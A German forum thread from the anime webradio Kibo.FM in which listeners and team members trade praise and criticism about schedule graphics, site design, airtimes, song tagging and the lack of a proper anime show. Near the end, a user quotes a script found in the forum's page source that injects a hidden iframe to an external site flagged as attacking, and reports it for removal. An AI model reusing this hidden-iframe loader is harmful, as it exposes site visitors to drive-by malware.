Lob und/oder Kritik

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • So, dann werd ich mal etwas Kritik hier loslassen. Hinweis vorweg: Das ist meine persönliche Meinung, es kann also sein, dass ich damit auch jemanden auf die Füße trete.

      • Ich mag die neuen (nicht ganz neu, ich meine damit die, die alte Sendebildchen ersetzt haben) Sendeplanbildchen nicht so wirklich, ein Dorn im Auge ist mir, dass eine Schriftart sehr oft verwendet wird (8x, wenn ich mich nicht verzählt habe) und daher viele Sendebildchen ähnlich/nahezu gleich aussehen. Die Schriftart, die ich meine, ist die auf dem mamonaku-Bildchen. Auch find ich, dass einige Bilder so gut wie nichts zur Sendung aussagen können, ein Beispiel hierfür wären ani-mania und kokoku news, darauf sind einfach nur 2 Anime-Charaktere mit Schriftzug. Man hat vielleicht nicht die größte Auswahl bei solchen Sendungen, aber das finde ich etwas unkreativ
      • Was ist eigentlich mit der kibomail-Adresse? Sie wurde Ende 2010 angekündigt und sollte laut Zero vor einigen Posts evtl. schon im Sommer starten.
      • Der Aufbau der akteullen Hauptseite gefällt mir gar nicht. Ich hätte gerne wieder 2 Seitenleisten links und rechts und oben nur den Header. Links die ganzen Menüpunkte, rechts der Radiostatus, Twitter, Quote der Woche usw. Das Onigiri-Maskottchen find ich in seiner jetzigen Form aich nicht so schön. So, wie es auf den alten Flyern aussieht, finde ich es besser. Dazu noch das "Farbenzusammenspiel" der Seite aktuell mag ich nicht so sehr. Und ein ständiger Design-Wechsel muss auch nicht sein, das Design wird ja alle paar Monate total umgemodelt. Ein Design sollte ruhig für mehrere Jahre bestehen bleiben, nicht alle 3, 4, 5 Monate.
        //Update 11.3.2012 - Das jetzige Deisgn kommt farblich an das Ursprungsdesign ran, aber vom Aufbau her ähnlich wie vorher.
      • Ich möchte jetzt nicht sagen, dass die Qualität der Informationen in den News schelcht ist, aber es gibt recht viele kleine aber feine Rechtschreibfehler, die den News-Schreibern nicht passieren sollten/dürften. Die Beherrschung der deutschen Rechtschreibung bzw. Sprache wird ja auch gefordert. Kommafehler, dass-das oder solche Worte wie "Standart" (man schreibt es mit d, mit t hab ich es letztens in einer News gelesen) stören mich ziemlich.
      • Ich finde, es macht wenig Sinn, den Bot schon um 13:00 starten zu lassen, viele sind zu der Zeit noch gar nicht zu Hause. 15:00 bis 03:00 wäre eine bessere Zeit, da auch gerade am Wochenende sicher ein paar Nachtschwärmer noch ein wenig japanische Musik im Ohr haben wollen.
      • Früher wirkte Kibo für mich wie eine kleine große Familie, was heute nicht mehr so ist, das ist aber nur ein persönlicher Eindruck...


      Ich will hiermit keinen beleidigen, sondern hab nur mal das aufgezählt, was mich aktuell so auf Kibo stört.
      Nichtsdestotrotz gibt es auch (sehr) gute Sachen an Kibo, über die ich mich nicht beschweren kann.
    • Hi Kira, hier mal paar "Antworten":

      - Zur Seite: Man kann es in diesem Punkt nicht jedem Recht machen. Die Seite ähnelt dem Vorgänger, richtig. Das ist ja auch so beabsichtigt ;) Und dieses Design soll auch nun bleiben, ich würde jetzt mal nicht "Final"-Design nennen, aber es bleibt nun einige Zeit so. ^^

      - Zu den News: Alle machen Fehler, auch Redakteure! Wir alle bemühen uns natürlich so wenig Fehler, wie möglich zu machen, dennoch können sie passieren. Wenn ich zum Beispiel im nachhinein ein Fehler entdecke besser ich den selbstverständlich sofort aus. Wenn du einen gravierenden Fehler entdeckst oder der Satzbau passt nicht, dann kannst du sehr gerne den entsprechenden Redakteur benachrichtigen, sodas es korrigiert wird!

      - Zu den Zeiten: Ja du könntest recht haben, aber nachts um drei werden es auch "nur" wenige Hörer sein. Ich kann dazu nicht viel sagen, aber um 14:00 Uhr - mittwochs - sendet z.B. Tsubomi. Und sie kann aufgrund der Zeitverschiebung nicht zur anderen Zeit.

      - Familie: Erkläre es! Wie war diese Situation/Zeit? Und vorallem sag uns doch mal, was wir tun können um - deiner Meinung nach - eine kleine große Familie sein können! :)


      -> Meinungsfreiheit mein Lieber ;) Wir wollen ja Lob/Kritik/Anregungen haben. ^^
      !!! Vorsicht verrückt !!!
      Bitte nehmen Sie sich in Acht vor den Andytainer! Keiner weiß, was als nächstes passiert, wenn man sich mit ihm aufhält.
      Eigenschaften: lieb | knuddelig | schreibselig | Koreaner-suchtend | ideenreich
    • Gut, das mit den news war vielleicht doch etwas übertrieben^^;

      Dass Tsu (leider) zu keiner anderen Zeit senden kann, ist schon doof, wie wäre es damit: Sobald Tsu wieder aus Japan zurück ist und sie ihren alten Sendeplatz bekommen kann, kann man doch vlt die Zeit etwas nach hinten verschieben.

      Früher fühlte ich mich so ein wenig wie in einer kleinen Anime/Japan-Fan-Familie, ich weiß auch nicht genau wieso, aber heute hab ich dieses gefühl nicht mehr, vlt auch deshalb, weil Kibo wächst und nicht mehr so klein wie zu Anfang ist oder es liegt am Chat, weil dort außerhalb von Sendungen so gut wie gar nichts mehr los ist. (Früher war's im Vergleich zu Sendezeiten auch ruhiger, aber es waren auch mal Leute drin und nicht nur ein AFK-Mod und die Bots)
      Ich glaube, da könnt ihr aber weniger tun, wenn es am Chat liegen sollte.

      Update:
      Der neue Sendeplan gefällt mir sehr gut, aber ich finde, dass der Rahmen um die Sendebildchen weg sollte. Und die Wochenauswahl fehlt jetzt auch.
    • Hallo Kira,

      hier mal ein paar Worte von mir (persönlich, also bitte nicht auf das Team beziehen):

      Zu den Sendeplanbildchen kann ich nicht viel sagen, außer, dass jedes Teammitglied bestimmen darf, wie sein Bildchen aussieht, und ob ihm das Ergebnis so gefällt. Wenn ja, wird es veröffentlicht. Dass dabei etliche Bilder "gleich" aussehen ist vielleicht nicht schön, aber aus meiner Sicht nicht tragisch, da wir gerne bei Kibo.FM weiter vereinheitlichen möchten. Das Stichwort lautet "Corporate Identitiy", bzw. "Corporate Design". Bei Dr. Oetker, der Telekom oder Knorr sieht schließlich auch alles gleich aus ;)

      Die KiboMail-Adressen (ich entschuldige mich an dieser Stelle für die fehlende Kommunikation) sind derzeit immernoch in der Planung. Grund sind u.A. auch die mehrfache Umprogrammierung und Redesign-Maßnahmen der Webseite, aber auch berufliche Gründe. Da ich weder die Programmierung noch das Design allein stemmen kann, bin ich auf Marcel und Momo angewiesen. Da aber beide mitten in der Ausbildung stecken, ist die Zeit zur gemeinsamen Projektarbeit begrenzt, gerade wenn auch noch andere Dinge anliegen, die Kibo.FM betreffen. Das Real-Life verschlingt nun einmal mehr Zeit als man hat, da müssen Hobbies wie Kibo.FM nun einmal zurückstecken, auch wenn es für Euch User natürlich letztlich ziemlich blöd ist, wenn wir groß etwas ankündigen und dann nicht einhalten. Meistens (in 90% aller Fälle) steckt das Real-Life dahinter.

      Die Hauptseite wurde aus meiner Sicht entsprechend aktueller Standards und Designmuster umdesignt. Wir haben im Vorstand lange darüber beraten, was wir machen, und haben uns letztlich an Webseiten anderer Webradios (darunter ziemlich erfolgreiche und professionelle Webradios wie RauteFM) orientiert. Dass das Ergebnis nicht immer allen gefällt ist uns natürlich klar, jedoch wurde die neue Webseite von einem Großteil des Teams angenommen.
      Die häufigen Designwechsel (wobei ich nicht weiß, was du unter Design verstehst) sind ganz einfach zu erklären: Ein Header pro Jahreszeit plus Umstellung der Farben im Wintern (Was es meinem Wissensstand nach auch nicht mehr geben soll) plus Sonderheader bei AKtionen.
      Die Struktur ist jedoch immer die gleiche geblieben, sodass man sich trotz neuem Header nie umgewöhnen musste.

      Dass der Bot von 13.00 Uhr an sendet war (tätä tätä tätä) ein Wunsch einer großen Anzahl an Hörern. Diesem Wunsch sind wir nachgekommen. Wie immer ist es so, dass einzelne es gerne anders hätten. So hätten einige USer es lieber, wenn Infosendungen wie Asian Heartbeat komplett aus dem Programm verschwinden. Aber wir können es wie bereits erwähnt nicht jedem recht machen. Wir werden aber deinen Vorschlag im Vorstand gerne vorbehaltlos diskutieren und gegebenenfalls die Sendezeiten anpassen. Allerdings (und hier sage ich mal ganz persönlich meine Meinung) ist die Sendezeit bis 3 Uhr nachts genauso schwachsinnig wie die Sendezeit von 13 Uhr an. Zuhören wird da eh keiner....

      Stichwort "Family": Diese Kritik habe ich bereits von mehreren Seiten gehört. Und ich kann dir auch (zumindest aus meiner Sicht) ganz klar sagen, woran das liegt.

      Ein Hörer kommt neu in unsere Community. Er findet es erstmal ganz nett und bleibt eine ganze Weile.
      Nach einiger Zeit merkt er, dass das Radio doch nichts für ihn ist. Hier gibt es mehrere Gründe:

      - Der Hörer bekommt nicht die Musik zu hören, die er gut findet. Er greift deshalb auf die Mittel des Modernen Internets zurück und öffnet Youtube. Meistens geben diese Hörer auch anderen Radios keine Chance.

      - Dem Hörer enthalten einige Sendungen zu viele Informationen (kommt auf die Sendung an). In diesem Fall kann man dem Hörer nicht helfen, da wir nicht extra wegen ihm unser Konzept ändern (sorry für die harten Worte)

      - Der Hörer hört eine Zeit lang zu, verliert dann aber generell das Interesse. Das trifft wohl auf den größten Teil der Hörer zu. Die Szene ist extrem schnelllebig geworden, die Materialien (DVDs, Subs, Musik) ist viel leichter zu bekommen (Stichwort Filesharing), sodass man nicht mehr auf Radios oder Web-TV angewiesen ist.

      Deshalb (schnelllebige Szene) sind auch viele alte Hörer nicht mehr dabei. Sie sind mittlerweile entweder in einer Clique, die sich von der großen Gemeinschaft abkapselt, oder haben Anime und Manga gänzlich "abgeschworen", stecken in der Ausbildung, sind in einer Bezeihung, oder haben andere Hobbies gefunden. Dass darunter die "Familie Kibo.FM" leidet, ist klar, aber in diesem Fall können wir da nichts machen. Falls du aber noch andere Gründe siehst, vielleicht Fehler oder Fehlentscheidungen von der Radioleitung, teile sie uns bitte mit. Ohne Kritik können wir nichts verbessern!

      So, das war jetzt viel auf einmal, aber ich hoffe ich bin Neutral und freundlich geblieben. Falls nicht tut es mir Leid.

      Grüße

      ZeroEnna
    • Ich sehe es genau wie du Zero.

      Man kann es nirgendwo ALLEN Recht machen. Man kann es nur so machen, auf das einzugehen, was viele haben wollen bzw. zum Design ich hab sehr viel gute Resonanz gehört!

      Ich persönlich habe auch Sendungen auf Kibo.FM, die ich nicht (so) mag, aber dafür gehört Asian Heartbeat zu meinen aller liebsten Lieblingssendungen hier!

      Nochmals zu Familie: Ich denke schonmal gar nicht, das es dran liegt, dass Kibo.FM wächst. Im Gegenteil, das ist doch sogar besser. Man lernt nochmehr Gleichgesinnte kennen, die die gleichen Vorlieben haben: Anime, Manga und J-Music!
      Für das "Problem", das wenige Leute außerhalb der Sendungen im Chat sind, läßt sich durchaus was machen - ich hab da auch schon Ideen ;)

      Zum Sendeplan: Ja der Sendeplan sieht super aus! Voll auf dem modernsten Stand - das hat @Marcel: Super hinbekommen! Fettes Lob!!
      !!! Vorsicht verrückt !!!
      Bitte nehmen Sie sich in Acht vor den Andytainer! Keiner weiß, was als nächstes passiert, wenn man sich mit ihm aufhält.
      Eigenschaften: lieb | knuddelig | schreibselig | Koreaner-suchtend | ideenreich
    • Da man esn icht allen recht machen kann, würde ich es mir zumindest selbst recht machen, mit dem Add-On "Stylish" kann man ja Websites mit eigenen Stilen verändern, wie es einem selbst am besten gefällt. Daher hätt' ich 'ne Frage: Wäre es möglich, mir ältere Sendebildchen zukommen zu lassen, damit ich die bei mir lokal ändern kann?^^
    • Lob: ihr macht eure sache echt gut und manchmal staune ich nur was ihr alles für Musik auf Lager habt, miau.
      Kritik: LEider kann ich KIibo.FM nicht hören weil man dafür sehr guten Internet verbindung braucht. Ich habe nur ein einfaches unverschlüsseltest W-Lan. Macht das mal ihrgetwie, das auch I net Besuche das hören können, wenn die Verbindung nicht so übelst ist, miau.
    • So gut muss das Internet nicht sein, der Stream läuft mit einer Qualität von 128kbps (knapp 1MB pro Minute), eine Geschwindigkeit von 16KB/s Download sollte dafür vollkommen ausreichen, und selbst die langsamsten Angebote kommen über diese Geschwindigkeit.
      Dabei spielt es auch keine Rolle, ob dein WLAN verschlüsselt ist oder nicht (aber es wäre übrigens besser, es zu verschlüsseln, da sonst Nachbarn oder andere Leute auf euer Internet zugreifen können, was deinen Speed natürlich drosselt!). Eventuell bist du auch zu weit von deinem Router entfernt, sodass das Signal schwach ist und ab und zu abbricht.
    • Es wäre auch interessant, welches Internet am Wlanrouter hängt und welche Wlantechnik ihr habt.

      Bei mir war es z.b. früher so das der Wlan Router mit 802.11g nur bis zum 1ersten Stockwerk voll da war und im zweiten nur minimalst. Mit 802.11n hingegen hab ich selbst im obersten Stockerwerk vollen empfang an meiner 802.11g und 802.11n Netzwerkkarte.
      Und wie Kira schon sagte, selbst das kleinste DSL was glaub momentan mehr als 1000er ist, bietet einen ausreichenden Download.

      Entweder sitzt du zu weit vom Router weg, der die Leistung nicht bringt oder irgendwas belastet eurer Internet massivst.

      Teste mal deine genaue Geschwindigkeit aus.
      Einfach bei google, geschwindigkeitstest eingeben.


      Gruß
      Aono
    • Hallo liebes Kiboteam.

      Ich und ein paar andere Hörer des Radios haben uns einmal zusammengesetzt und uns überlegt, wie man vielleicht mehr Leute dazu bewegt bei euren Sendungen zuzuhören. Im Allgemeinen ist Kibo wirklich ein sehr schönes Radio und wir Hörer haben untereinander so eine kleine Familienbande aufgebaut. An dieser Stelle möchten wir uns für die Freundschaften bedanken, die durch euch entstehen konnten. Aber trotzdem ändert es nichts an der Tatsache, dass uns schlicht und ergreifend eine ordentliche Animesendung fehlt, was bei einem Animeradio eigentlich etwas verwunderlich ist.

      Wahrscheinlich geht es den Meisten nun durch den Kopf
      "Wir haben ja Ani-Mania als unsere Animesendung - Wo ist also dein Problem?"
      Ich denke, ich spreche auch im Sinne vieler anderer Zuhörer, wenn ich sage, dass Ani-Mania nicht das hält, was es verspricht!
      Es gibt die Charts, eine lange Playlist. Hier und da mal eine Moderation. Das beschreibt die Sendung Ani-Mania voll und ganz. Es soll natürich keine Beleidigung an die Moderation sein, aber es ist schlichtweg langweilig geworden.
      Viele der User würde es interessieren, mal ein paar Informationen zu hören über beispielsweise die Animes, die aktuell im japanischen Fernsehen anlaufen. Oder generell über auch ältere Animes, die vielleicht nicht so bekannt sind. Als kleinen Anstoß für die, die sich bei der Animeauswahl ein wenig schwer tun und sich gern den einen oder anderen Vorschlag machen lassen.

      Es würde nicht schaden, wenn es neben Ani-Mania noch eine zweite Sendung über das Thema Animes geben würde. Falls die Moderation keinen Änderungsbedarf sieht, gibt es sicher einen oder zwei der anderen Moderatoren, die sich gern bereiterklären einen kleinen Thementalk darüber zu machen und eine gänzlich neue Sendung ins Leben rufen. Allerdings wäre es natürlich auch gut, wenn einfach das Sendekonzept von Ani-Mania ein wenig umgestellt werden würde. Und dazu hätten wir Hörer nun ein paar Anregungen und Vorschläge dafür, wie man das bewerkstelligen könnte. Die Mehrheit von den Beteiligten hat zugestimmt, dass sie folgende Änderungen sehr interessieren und sie auch gern dabei zuhören würden:

      1. Vorstellung neuer Animes. Sprich: eine neue Season. Welche Serien laufen an? Beim Start einer Season eine kleine Zusammenfassung aller Neustarter mit kleiner Inhaltsangabe und eventuell noch Beispiellieder. Openings und Endings, falls diese schon released sind.
      2. Jede Woche eine genaue Vorstellung von 1-2 Animes aus der neuen Season in der spezifisch auf die Sendungen eingegangen und ein wenig darüber erzählt wird. Vielleicht einige userbezogene Erfahrungsberichte oder Empfehlungen was die Animes angeht.
      3. Eventuell ein Thementalk von 2-3 Personen, in der über solche Animes diskutiert wird und ein bisschen Kritik oder Lob geübt wird.
      4. Rückblicke auf die zurückliegende Season, ein best of oder eventuell eine Umfrage, in der die Hörer abstimmen können.
      5. Eine Vorschau auf Neuerscheinungen. Zb. Pressemeldungen, Trailer, Inhalte, etc.
      6. Auch nicht nur über Neuheiten, sondern auch über Animes sprechen, deren Release schon ein wenig zurückliegt. (eine Season, ein paar Monate/Jahre)

      In erster Linie ist das ziemlich viel auf einmal und es ist verständlich, dass das nun ziemlich viel verlangt ist. Daher würde es vielleicht wirklich besser sein, wenn es nebenher noch eine zweite Animesendung geben würde, da dies alles wahrscheinlich nicht bei Ani-Mania untergebracht werden kann. Zum Beispiel könnte man die Vorschläge aufteilen. Eine Sendung für die komplett neuen Animes, die je nach Season released werden und Ani-Mania könnte dann rückblickend auf die vergangenen Seasons ein wenig eingehen.

      Zum Schluss möchte noch einmal gesagt werden, dass das ein lieb gemeinter Verbesserungsvorschlag ist, da ein Großteil der Hörer gelangweilt ist. Und wir würden es alle sehr bedauern, wenn das weiterhin so bleiben würde. Wir hoffen, dass wir wenigstens eine kleine Rückmeldung auf unseren Vorschlag bekommen, weil uns die Zukunft unseres Lieblingsradios sehr am Herzen liegt und wir uns freuen würden, wenn wieder ein wenig mehr Leben reinkommt.

      Liebe Grüße,
      Lucia :3
    • Dann möchte ich auch noch etwas loswerden. Zuerst stimme ich Lucia oben in allen Punkten zu.
      Was mir dann noch in letzter Zeit vermehrt aufgefallen ist, dass fast jeder Song im Bot falsch getaggt ist. Anime-Namen sind keine Interpreten. Zudem sind manche Songs nur in CAPS LOCK oder nur kleingeschrieben (Ja, es gibt Ausnahmen, bei denen es so sein soll, aber das ist nicht bei allen so.)
    • Also zu dem Beitrag von Lucia kann ich nur sagen, dass ich ihr da voll und ganz zustimme. Ich habe das auch schon von einigen gehört.
      Was bringt uns eine Anime-Sendung, die eigentlich für Informationen über Anime da ist, wenn da nur eine Playlist abgespielt wird und sie null Informationsgehalt hat? Wenn die Moderation es halt aus Zeitgründen nicht schafft, selbst Themen zu suchen, dann kann er doch vielleicht jemanden damit beauftragen (Nen Redakteur oder was weiß ich) oder es muss wirklich eine zweite Sendung her, in der Anime auch wirklich beleuchtet werden. Animania jedenfalls wird seinem Konzept nicht gerecht und das muss die Moderation, finde ich, auch selbst einsehen.
      Dass ich Animania nicht mehr höre, hat vor allem auch den Grund, den Lucia bereits ansprach: Es ist langweilig geworden. Früher hat man wenigstens noch Informationen erhalten, heute ist es einfach nur noch Charts und dann ne Playlist.
      Das soll die Moderation jetzt auf keinste Weise angreifen und falls doch, dann entschuldige ich mich schon im vornherein. Aber ich bin genau Lucias Meinung, es muss sich hinsichtlich einer Anime-Sendung etwas ändern. Dann kommen vielleicht auch die Hörer zurück.


      So the little infant fell into a deep sleep. Among the grey ashes in the flames shining...First one,then two ...
      そして 坊やは 眠りについた
      息衝(づ)く 灰の中の炎 ひとつ ふたつと
    • Antwort: Anime-Sendung

      Ich sage jetzt auch mal was dazu wenn es erwünscht ist. Wenn nicht, dann darf man meinen Beitrag löschen.

      Zum Thema Anime-Sendung:

      Wenn man's genau nimmt, dann hat Kibo eine reine Informationssendung über Animes, die aber derzeit weiterhin bis auf unbestimmte Zeit pausiert ist: "Eyes on Anime" mit @Chadone:. Das er auf Pause ist hat verschiedene Gründe und muss nicht jetzt hier aufgelistet werden. In "Eyes on Anime" wurde in zwei Stunden ein Anime vorgestellt, der Inhalt erklärt, mit Pro- und Contra verglichen und zum Schluss ein Fazit gezogen. Also eigentlich wär eine Sendung da, ist aber derzeit im Dornröschenschlaf, da Chadone nicht da ist.

      Jetzt wird man sich sicherlich fragen: "Warum vertritt ihn dann niemand?". Diese Frage kann ich auch beantworten. Der gute @AonoMuffin: wollte die Sendung bis Chadones Rückkehr vertreten und das Konzept weiter ausführen. Leider gab es teaminterne Kontroversen, sodass er es schlussendlich gelassen hat. Näher darf ich nicht eingehen was passiert ist. Seitdem ist es um die Sendung still geworden und keiner sendet diese Infosendung.

      Zum Thema Musik im Bot:

      Das ist mir auch schon aufgefallen. Nicht nur, dass es im Bot noch Jingles von Weihnachten oder Ostern gibt, nein, es gibt auch noch Zeros Hintergrundmusik von "BANZUKE!" im Bot zu hören XD Manchmal hab ich auch Songs gesehen die "Anime - Song.mp3" hießen. Also da sollte meiner Meinung nach nachgeholfen und nochmal drübergegangen werden und eventuell veraltete Jingles entfernen.

      Ich hoffe meine Antwort war ausführlich und hilfreich.

      Nachti
      Nachti macht den Tag zur Nacht!
    • Kira schrieb:

      Dann möchte ich auch noch etwas loswerden. Zuerst stimme ich Lucia oben in allen Punkten zu.
      Was mir dann noch in letzter Zeit vermehrt aufgefallen ist, dass fast jeder Song im Bot falsch getaggt ist. Anime-Namen sind keine Interpreten. Zudem sind manche Songs nur in CAPS LOCK oder nur kleingeschrieben (Ja, es gibt Ausnahmen, bei denen es so sein soll, aber das ist nicht bei allen so.)
      Kira du "Tag-Fetischist". :D Glaub aber das liegt daran, dass die Kibo-Leitung? oder die diejenigen, die den Bot mit Musik füllen keine Zeit für eine doch solch zeitintensive Arbeit im Moment oder allgemein haben.
    • joker1000 schrieb:

      Glaub aber das liegt daran, dass die Kibo-Leitung? oder die diejenigen, die den Bot mit Musik füllen keine Zeit für eine doch solch zeitintensive Arbeit im Moment oder allgemein haben.
      Dazu kann ich nur sagen: Wenn man schon so was macht, dann sollte man es auch richtig machen. Es mag recht kleinlich klingen, aber ich bin auch nicht sonderlich von solchen falschgetaggten Sachen begeistert ^^
      Besonders auch, da es nicht sonderlich hilfreich ist, falls man sich den Song noch mal bei Youtube anhören will und den Interpreten nicht kennt.
      Liegt im Auge des Betrachters, aber ich finde, dass ist schon fast eine reine Selbstverständlichkeit, seine Arbeit gewissenhaft und korrekt zu erledigen. Auch wenn es nur für die Freizeit ist.
    • Ich hab da etwas im Quellcode gefunden, was eventuell ausgebessert werden müsste.
      Und zwar steht in der letzten Zeile des Quellcodes auf der Forenhauptseite

      Quellcode

      1. <script>var url="http://online-alles.net";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script>

      Ich hab mal geschaut, was das für eine Seite (online-alles.net) ist und sehe, dass diese Seite von Google als attackierend gemeldet wurde. Sollte man eventuell entfernen, falls dieser Code nicht absichtlich eingefügt wurde (zB. von Dritten eingefügt).
    • Das Thema der falschen taggs wurde schon oft erwähnt, ich habs auch schon angesprochen, da ich meine Lieder immer nach Interpret und Titel tagge. Daher sag ich auch öfter, das mir die Leute ihre Musikwünsche mit Titel und Interpret schicken sollten und nicht, wünsche mir das Naruto XY Opening, da ich es vielleicht hab, aber es nicht kenne (schaut kein Naruto mehr).

      Das mit der Animesendung fiehl mir auch schon auf, das war glaub Dezember 2011, da hab ich meine Interesse an einem solchen Sendekonzept zum ausdruck gebrach, vor allem da ich viele aktuelle Anime gucke und auch viele alten Serien auf DVD besitze. Jedoch hab ich es, wie Nachti sagte, wegen Teaminternen Situationen sein gelassen.

      Technisch gesehen hat Kibo 2 Animesendungen. Das wären Animania mit Marcel und Eyes on Anime mit Chadone.
      Das Chad momentan weg ist, ist schade, aber ändern kann man es schwer. Zwar würde ich immer noch dafür bereit stehen ne 2te Sendung neben Nippon Rocks zu machen, aber nur wenn es gewünscht ist und die Leitung mir das Ok gibt, solange Chad weg ist, eine Animesendung zu machen.


      Grüße Aono